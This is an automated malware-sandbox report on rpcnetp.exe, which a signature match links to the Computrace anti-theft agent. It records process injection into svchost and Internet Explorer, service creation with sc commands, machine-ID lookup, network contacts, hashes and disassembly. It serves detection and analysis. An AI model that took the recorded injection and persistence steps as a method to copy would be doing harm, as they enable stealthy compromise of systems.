Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	Thread created: unknown EIP: 72B22314	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	Thread created: unknown EIP: 72B22314	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	Thread created: unknown EIP: 72B22314	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	Thread created: unknown EIP: 72B22314	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	Thread created: unknown EIP: 72B22314	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	Thread created: unknown EIP: 72B22314	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	Thread created: unknown EIP: 72B22314	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	Thread created: unknown EIP: 72B22314	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	Thread created: unknown EIP: 72B22314	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	Thread created: unknown EIP: 72B22314	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	Thread created: unknown EIP: 72B22314	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	Thread created: unknown EIP: 72B22314	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	Thread created: unknown EIP: 72B22314	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	Thread created: unknown EIP: 72B22314	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	Thread created: unknown EIP: 72B22314	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	Thread created: unknown EIP: 72B22314	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	Thread created: unknown EIP: 72B22314	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	Thread created: unknown EIP: 72B22314	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	Thread created: unknown EIP: 72B22314	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	Thread created: unknown EIP: 72B22314	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	Thread created: unknown EIP: 72B22314	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	Thread created: unknown EIP: 72B22314	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	Thread created: unknown EIP: 72B22314	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	Thread created: unknown EIP: 72B22314	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	Thread created: unknown EIP: 72B22314	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	Thread created: unknown EIP: 72B22314	Jump to behavior

Allocates memory in foreign processes

Show sources

Source: C:\Users\user\Desktop\rpcnetp.exe	Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 620000 protect: page read and write			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory allocated: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: E30000 protect: page read and write			Jump to behavior

Source: C:\Users\user\Desktop\rpcnetp.exe	Code function: LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,LocalFree,OpenProcess,OpenProcessToken,CloseHandle,FreeLibrary,LocalFree, explorer.exe	6_2_00A12123
Source: C:\Users\user\Desktop\rpcnetp.exe	Code function: LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,LocalFree,OpenProcess,OpenProcessToken,CloseHandle,FreeLibrary,LocalFree, explorer.exe	6_2_72B22123
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	Code function: LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,LocalFree,OpenProcess,OpenProcessToken,CloseHandle,FreeLibrary,LocalFree, explorer.exe	8_2_72B22123

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc create EcVoz binpath= 'C:\Users\user\Desktop\rpcnetp.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc start EcVoz	Jump to behavior
Source: C:\Users\user\Desktop\rpcnetp.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\iexplore.exe	Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\rpcnetp.exe

Code function: 6_2_00A132DE GetVersion,GetStdHandle,CloseHandle,CloseHandle,SetStdHandle,CreateEventA,CreateThread,WaitForSingleObject,WaitForSingleObject,CloseHandle,WaitForSingleObject,CloseHandle,CloseHandle,ExitProcess,

6_2_00A132DE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts1	Service Execution3	Valid Accounts1	Valid Accounts1	Masquerading1	OS Credential Dumping	Security Software Discovery1	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Non-Application Layer Protocol2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Windows Service4	Access Token Manipulation1	Valid Accounts1	LSASS Memory	Process Discovery1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Application Layer Protocol2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Shared Modules1	DLL Side-Loading1	Windows Service4	Access Token Manipulation1	Security Account Manager	System Information Discovery3	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Process Injection421	Process Injection421	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	DLL Side-Loading1	Obfuscated Files or Information1	LSA Secrets	Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	DLL Side-Loading1	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Link
rpcnetp.exe	3%	Virustotal	Browse
rpcnetp.exe	5%	Metadefender	Browse
rpcnetp.exe	3%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\Desktop\rpcnetp.dll	7%	Virustotal		Browse
C:\Users\user\Desktop\rpcnetp.dll	7%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Download
8.1.iexplore.exe.72b20000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
7.1.svchost.exe.72b20000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
6.1.rpcnetp.exe.a10000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
6.1.rpcnetp.exe.72b20000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

Source	Detection	Scanner	Label	Link
search.namequery.com	2%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://search.namequery.com/	2%	Virustotal		Browse
http://search.namequery.com/	0%	Avira URL Cloud	safe

Domains and IPs Download Network PCAP: filtered – full

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
search.namequery.com	209.53.113.223	true	false	2%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://search.namequery.com/	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
209.53.113.223	search.namequery.com	Canada		852	ASN852CA	false

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	499091
Start date:	07.10.2021
Start time:	21:22:39
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 46s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	rpcnetp.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Run as Windows Service
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal72.evad.winEXE@14/5@1/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 78.6% (good quality ratio 76.8%) Quality average: 88.1% Quality standard deviation: 22.9%
HCA Information:	Successful, ratio: 66% Number of executed functions: 28 Number of non-executed functions: 51
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe Excluded IPs from analysis (whitelisted): 20.82.209.183, 95.100.218.79, 204.79.197.222, 93.184.221.240, 209.197.3.8 Excluded domains from analysis (whitelisted): fp.msedge.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, wu.ec.azureedge.net, wu-shim.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, arc.msn.com, wu.azureedge.net, a-0019.a-msedge.net, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, a-0019.standard.a-msedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, 1.perf.msedge.net Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

Time	Type	Description
21:23:39	API Interceptor	1096x Sleep call for process: rpcnetp.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
209.53.113.223	NTAgent.exe	Get hash	malicious	Browse	search.namequery.com/
	rpcnet.exe	Get hash	malicious	Browse	search.dnssearch.org/
	rpcnetp.exe	Get hash	malicious	Browse	search.namequery.com/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
search.namequery.com	NTAgent.exe	Get hash	malicious	Browse	209.53.113.223
	rpcnet.exe	Get hash	malicious	Browse	209.53.113.223
	rpcnetp.exe	Get hash	malicious	Browse	209.53.113.223

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ASN852CA	e7HWBo7yQM	Get hash	malicious	Browse	75.152.119.182
	GaSBpMyVub	Get hash	malicious	Browse	162.157.2.46
	ntpclient	Get hash	malicious	Browse	204.191.51.200
	arm7-20211004-1530	Get hash	malicious	Browse	209.89.133.142
	Zot0D0dD8J	Get hash	malicious	Browse	173.183.134.242
	lessie.arm	Get hash	malicious	Browse	207.229.7.32
	sora.arm	Get hash	malicious	Browse	161.188.162.163
	NazNIp21Xu	Get hash	malicious	Browse	205.206.179.186
	LRLZJUXBPk	Get hash	malicious	Browse	75.153.94.132
	P2gQCIjHzq	Get hash	malicious	Browse	23.16.230.107
	sora.arm	Get hash	malicious	Browse	75.159.255.198
	XO2PcLc9yO	Get hash	malicious	Browse	205.206.220.151
	whoareyou.arm7	Get hash	malicious	Browse	162.157.2.71
	GbjE8Awfrz	Get hash	malicious	Browse	75.155.101.227
	xd.arm	Get hash	malicious	Browse	154.5.124.11
	soramrk.x86	Get hash	malicious	Browse	142.179.228.81
	xd.arm	Get hash	malicious	Browse	99.199.0.194
	U1gjyXpR35	Get hash	malicious	Browse	23.16.38.70
	E2ecGhjXtG	Get hash	malicious	Browse	108.172.196.183
	ShxmSBgPmy	Get hash	malicious	Browse	154.5.100.23

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Crypto\RSA\S-1-5-18\1942f959aae25ff5e177f0a0e912022f_d06ed635-68f6-4e9a-955c-4899f5f57b9a Download File
Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	57
Entropy (8bit):	2.062967662624547
Encrypted:	false
SSDEEP:	3:/lEltfgnwT:yvT
MD5:	B5D2B9D74D52DAC47A3F3CB1D065305F
SHA1:	41A4742BC23F3A6FF61C60884604DA6448FFF274
SHA-256:	6359A4FCB0DABE70B88913A6A03CC21385459B8A924A6B3688A2E185C54DAAFA
SHA-512:	01EA77C5972D33494C10D6ADB47CB3F30EAC1AA4B93D6BAAFB75299AA99FED818A6275801BAAE92C18AC5D3C64443BB631A63C2B39B1B88BCD774218BB2B990F
Malicious:	false
Preview:	........................................computer$.

C:\Users\user\Desktop\rpcnetp.dll Download File
Process:	C:\Users\user\Desktop\rpcnetp.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	22934
Entropy (8bit):	6.250397881773485
Encrypted:	false
SSDEEP:	384:yaU8dza3ee7IuRMksm9XiL1TN5Aim2DYedCH7iAYxh+aVBKIwvP4o94Iwd:Ddzxe79/9XiL1JPR0edSOAqzBRwX4oK3
MD5:	D98DCCF777889A0A9BEEEE2923F511A9
SHA1:	0917C66788073AFC994841943D6D1446EFB429C3
SHA-256:	E57C660DB9EA653404A0664F0089B92B3D4B954C970EC6AD1DAD999AC50B5CDF
SHA-512:	D048E1787DE4C26D143FD3363F28260040D25901D6305BE81106D3B58DBCFEB747EC4F16D8666787F14609090F7B7A80CE5244F767E6B397670262D76E6FC393
Malicious:	true
Yara Hits:	Rule: PUP_ComputraceAgent, Description: Absolute Computrace Agent Executable, Source: C:\Users\user\Desktop\rpcnetp.dll, Author: ASERT - Arbor Networks (slightly modified by Florian Roth)
Antivirus:	Antivirus: Virustotal, Detection: 7%, Browse Antivirus: ReversingLabs, Detection: 7%
Preview:	MZ.............j........@...................................H....j......PE..L....U.U.................L..........u6.......`....@.......................................@..........................[..F...<T..x.......................................................................................L............................text....K.......L.................. ..`.data........`.......P..............@....cdata..<....p.......R..............@....reloc...............V..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\rpcnetp.dll:Zone.Identifier Download File
Process:	C:\Users\user\Desktop\rpcnetp.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\servicereg.log Download File
Process:	C:\Windows\SysWOW64\sc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	28
Entropy (8bit):	3.678439190827718
Encrypted:	false
SSDEEP:	3:4A4AnXjzSv:4HAnXjg
MD5:	A8F4D690C5BDE96AD275C7D4ABE0E3D3
SHA1:	7C62C96EFD2CA4F3C3EBF0B24C9B5B4C04A4570A
SHA-256:	596CCC911C1772735AAC6A6B756A76D3D55BCECD006B980CF147090B2243FA7B
SHA-512:	A875EBE3C5CDF222FF9D08576F4D996AF827A1C86B3E758CE23F6B33530D512A82CE8E39E519837512080C6212A0A19B3385809BE5F5001C4E488DD79550B852
Malicious:	false
Preview:	[SC] CreateService SUCCESS..

C:\servicestart.log Download File
Process:	C:\Windows\SysWOW64\sc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	421
Entropy (8bit):	3.505853435114574
Encrypted:	false
SSDEEP:	6:lg3D/8Fkov+gVKBRjGxVVLvH2s/u8qLLFmLaZnsHgm66//V+NmASCefq:lgAzv+gV0qVbH2suZLQqOVKmAJcq
MD5:	6A48546AF33EB7FDD7E14585D144690C
SHA1:	8CA1A55CE066780DB47108C241FBF0ECFFEDED90
SHA-256:	298B76A794423060FE25C90832043183E8FE0B31C880626ADDE20F6417289DAE
SHA-512:	B2DC8E096EA62C51EB821F5A87EC9EE86BCAE964BE55D571D32A4BEBD52E51A60BC0AAC51877D1069228B1029A64B6C15A3A2C8EB16A52336201B59431398AAC
Malicious:	false
Preview:	..SERVICE_NAME: EcVoz .. TYPE : 10 WIN32_OWN_PROCESS .. STATE : 2 START_PENDING .. (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN).. WIN32_EXIT_CODE : 0 (0x0).. SERVICE_EXIT_CODE : 0 (0x0).. CHECKPOINT : 0x0.. WAIT_HINT : 0x7d0.. PID : 7072.. FLAGS : ..

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.250156336870832
TrID:	Win32 Executable (generic) a (10002005/4) 99.94% Clipper DOS Executable (2020/12) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02%
File name:	rpcnetp.exe
File size:	22932
MD5:	57bd3200910a8d2c85b1927b27123a6b
SHA1:	bd08ae784aa0ed5428347c861ebeb71554af217f
SHA256:	f5157e5b8afe1f79f29c947449477d13ede3d7341699256e62966474a7ee1eb5
SHA512:	855095db2b996150afc6f5025270fc4f9f5b178bb3969f00e313c867570eca08f58ca5caef1c3950d83ea513434d4efdba24371a6da864665fcfb9288e8dae73
SSDEEP:	384:yaU8dza3ee7IuRMksm9XiL1TN5Aim2DYedCH7iAYxh+aVBKIwvP4o94IwS:Ddzxe79/9XiL1JPR0edSOAqzBRwX4oKw
File Content Preview:	MZ.............j........@...................................H....j......PE..L....U.U.................L..........u6.......`....@.......................................@..........................[..F...<T..x..................................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x403675
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x55115511 [Tue Mar 24 12:14:09 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	badaaa8b908ad021835c0e473265ef44

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
push esi
mov esi, 004060C4h
xor eax, eax
cmp dword ptr [esi], eax
jne 00007F20ECC0138Fh
push eax
call dword ptr [004010C8h]
mov ecx, dword ptr [ebp+08h]
jecxz 00007F20ECC01392h
cmp eax, ecx
je 00007F20ECC0138Eh
mov dword ptr [esi], ecx
push eax
push dword ptr [00401348h]
push ecx
call dword ptr [004010A0h]
cmp eax, 00402658h
pop eax
jne 00007F20ECC01376h
call 00007F20ECC019D0h
mov eax, 00000001h
mov dword ptr [0040608Ch], eax
pop esi
leave
retn 000Ch
mov dword ptr [esi], eax
pop esi
leave
jmp 00007F20ECC00F7Ah
push ebx
push esi
push edi
mov ebx, edx
xor edi, edi
mov esi, edi
mov al, byte ptr [esi+ebx]
inc edi
add al, al
mov byte ptr [esi+ecx], al
cmp edi, dword ptr [esp+10h]
jnl 00007F20ECC0136Fh
mov dl, byte ptr [edi+ecx]
shr dl, 00000007h
or dl, al
mov byte ptr [esi+ecx], dl
jmp 00007F20ECC01344h
pop edi
pop esi
pop ebx
retn 0004h
push ebp
mov ebp, esp
sub esp, 00000184h
push ebx
push esi
mov esi, dword ptr [ebp+18h]
push edi
push esi
push 00000000h
lea eax, dword ptr [ebp-00000184h]
push eax
call 00007F20ECC02980h
mov edi, dword ptr [ebp+10h]
mov edx, esi
mov ecx, edi
mov byte ptr [ebp-00000184h], 00000001h
call 00007F20ECC01616h
mov ebx, eax
jmp 00007F20ECC0139Bh
push dword ptr [ebp+14h]
lea edx, dword ptr [ebp-00000184h]
push eax
mov ecx, edx
dec ebx
call 00007F20ECC01263h
mov eax, ebx

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x5b90	0x46	.text
IMAGE_DIRECTORY_ENTRY_IMPORT	0x543c	0x78	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x8000	0x394	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x14c	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x4bd6	0x4c00	False	0.651624177632	data	6.54556135074	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x6000	0x1b8	0x200	False	0.11328125	data	0.461954390647	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.cdata	0x7000	0x23c	0x400	False	0.16796875	data	1.37476659487	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc	0x8000	0x394	0x394	False	0.909388646288	data	6.52173896111	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
ADVAPI32.dll	RegisterServiceCtrlHandlerA, RegCloseKey, RegOpenKeyA, CreateProcessAsUserA, StartServiceCtrlDispatcherA, RegQueryValueExA, SetServiceStatus, RegDeleteValueA, RegEnumValueA, DuplicateTokenEx, OpenProcessToken, SetTokenInformation
KERNEL32.dll	CloseHandle, CreateProcessA, SetStdHandle, LocalAlloc, DeleteCriticalSection, GetStdHandle, LeaveCriticalSection, RtlUnwind, GetSystemDirectoryA, CreateThread, ResumeThread, VirtualAllocEx, OpenProcess, LocalFree, WriteProcessMemory, CreateRemoteThread, ReadProcessMemory, InitializeCriticalSection, GetVersion, CopyFileA, TerminateThread, lstrlenA, GetBinaryTypeA, GetCurrentThreadId, VirtualFreeEx, ExitProcess, LoadLibraryA, GetProcAddress, WaitForMultipleObjects, WaitForSingleObject, GetExitCodeThread, lstrcatA, GetCurrentProcessId, FreeLibrary, ExitThread, RaiseException, lstrcpyA, GetModuleHandleA, SetEvent, CreateEventA, Sleep, lstrcmpiA, ResetEvent, CreateFileA, TerminateProcess, WriteFile, SetFilePointer, GetModuleFileNameA, SetThreadPriority, EnterCriticalSection
USER32.dll	CreateWindowExA, SetTimer, GetMessageA, TranslateMessage, RegisterClassA, KillTimer, DispatchMessageA, PostMessageA, PostThreadMessageA, PeekMessageA, PostQuitMessage, wsprintfA, DefWindowProcA
USERENV.dll	CreateEnvironmentBlock
WSOCK32.dll	inet_addr, ioctlsocket

Exports

Name	Ordinal	Address
rpcnetp	1	0x402658

Network Behavior

Download Network PCAP: filtered – full

Network Port Distribution

Total Packets: 123
• 80 (HTTP)
• 53 (DNS)

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 7, 2021 21:23:45.489679098 CEST	49775	80	192.168.2.4	209.53.113.223
Oct 7, 2021 21:23:45.489749908 CEST	49776	80	192.168.2.4	209.53.113.223
Oct 7, 2021 21:23:45.654690981 CEST	80	49775	209.53.113.223	192.168.2.4
Oct 7, 2021 21:23:45.654717922 CEST	80	49776	209.53.113.223	192.168.2.4
Oct 7, 2021 21:23:46.163032055 CEST	49775	80	192.168.2.4	209.53.113.223
Oct 7, 2021 21:23:46.163655996 CEST	49776	80	192.168.2.4	209.53.113.223
Oct 7, 2021 21:23:48.163186073 CEST	49775	80	192.168.2.4	209.53.113.223
Oct 7, 2021 21:23:48.163634062 CEST	49776	80	192.168.2.4	209.53.113.223
Oct 7, 2021 21:23:48.327733040 CEST	80	49775	209.53.113.223	192.168.2.4
Oct 7, 2021 21:23:48.327856064 CEST	49775	80	192.168.2.4	209.53.113.223
Oct 7, 2021 21:23:48.328999996 CEST	49775	80	192.168.2.4	209.53.113.223
Oct 7, 2021 21:23:48.494014978 CEST	80	49775	209.53.113.223	192.168.2.4
Oct 7, 2021 21:23:48.602479935 CEST	80	49775	209.53.113.223	192.168.2.4
Oct 7, 2021 21:23:48.602603912 CEST	49775	80	192.168.2.4	209.53.113.223
Oct 7, 2021 21:23:52.325102091 CEST	49777	80	192.168.2.4	209.53.113.223
Oct 7, 2021 21:23:52.334279060 CEST	49775	80	192.168.2.4	209.53.113.223
Oct 7, 2021 21:23:52.494050026 CEST	80	49777	209.53.113.223	192.168.2.4
Oct 7, 2021 21:23:52.494151115 CEST	49777	80	192.168.2.4	209.53.113.223
Oct 7, 2021 21:23:52.501471996 CEST	80	49775	209.53.113.223	192.168.2.4
Oct 7, 2021 21:23:52.501490116 CEST	80	49775	209.53.113.223	192.168.2.4
Oct 7, 2021 21:23:52.501550913 CEST	49775	80	192.168.2.4	209.53.113.223
Oct 7, 2021 21:23:55.245099068 CEST	49775	80	192.168.2.4	209.53.113.223
Oct 7, 2021 21:23:55.409693003 CEST	80	49775	209.53.113.223	192.168.2.4
Oct 7, 2021 21:23:55.410012007 CEST	80	49775	209.53.113.223	192.168.2.4
Oct 7, 2021 21:23:55.410186052 CEST	49775	80	192.168.2.4	209.53.113.223
Oct 7, 2021 21:23:58.793450117 CEST	49775	80	192.168.2.4	209.53.113.223
Oct 7, 2021 21:23:58.957880020 CEST	80	49775	209.53.113.223	192.168.2.4
Oct 7, 2021 21:23:58.961870909 CEST	80	49775	209.53.113.223	192.168.2.4
Oct 7, 2021 21:23:58.962007046 CEST	49775	80	192.168.2.4	209.53.113.223
Oct 7, 2021 21:24:01.556579113 CEST	49775	80	192.168.2.4	209.53.113.223
Oct 7, 2021 21:24:01.721520901 CEST	80	49775	209.53.113.223	192.168.2.4
Oct 7, 2021 21:24:01.721555948 CEST	80	49775	209.53.113.223	192.168.2.4
Oct 7, 2021 21:24:01.723252058 CEST	49775	80	192.168.2.4	209.53.113.223
Oct 7, 2021 21:24:02.661020041 CEST	80	49777	209.53.113.223	192.168.2.4
Oct 7, 2021 21:24:04.566550970 CEST	49775	80	192.168.2.4	209.53.113.223
Oct 7, 2021 21:24:04.732942104 CEST	80	49775	209.53.113.223	192.168.2.4
Oct 7, 2021 21:24:04.736144066 CEST	80	49775	209.53.113.223	192.168.2.4
Oct 7, 2021 21:24:04.736267090 CEST	49775	80	192.168.2.4	209.53.113.223
Oct 7, 2021 21:24:07.688574076 CEST	49775	80	192.168.2.4	209.53.113.223
Oct 7, 2021 21:24:07.853148937 CEST	80	49775	209.53.113.223	192.168.2.4
Oct 7, 2021 21:24:07.853244066 CEST	80	49775	209.53.113.223	192.168.2.4
Oct 7, 2021 21:24:07.853488922 CEST	49775	80	192.168.2.4	209.53.113.223
Oct 7, 2021 21:24:10.701740026 CEST	49775	80	192.168.2.4	209.53.113.223
Oct 7, 2021 21:24:10.868128061 CEST	80	49775	209.53.113.223	192.168.2.4
Oct 7, 2021 21:24:10.868566036 CEST	80	49775	209.53.113.223	192.168.2.4
Oct 7, 2021 21:24:10.868704081 CEST	49775	80	192.168.2.4	209.53.113.223
Oct 7, 2021 21:24:14.042638063 CEST	49775	80	192.168.2.4	209.53.113.223
Oct 7, 2021 21:24:14.208025932 CEST	80	49775	209.53.113.223	192.168.2.4
Oct 7, 2021 21:24:14.208306074 CEST	80	49775	209.53.113.223	192.168.2.4
Oct 7, 2021 21:24:14.211158037 CEST	49775	80	192.168.2.4	209.53.113.223
Oct 7, 2021 21:24:18.016602039 CEST	49775	80	192.168.2.4	209.53.113.223
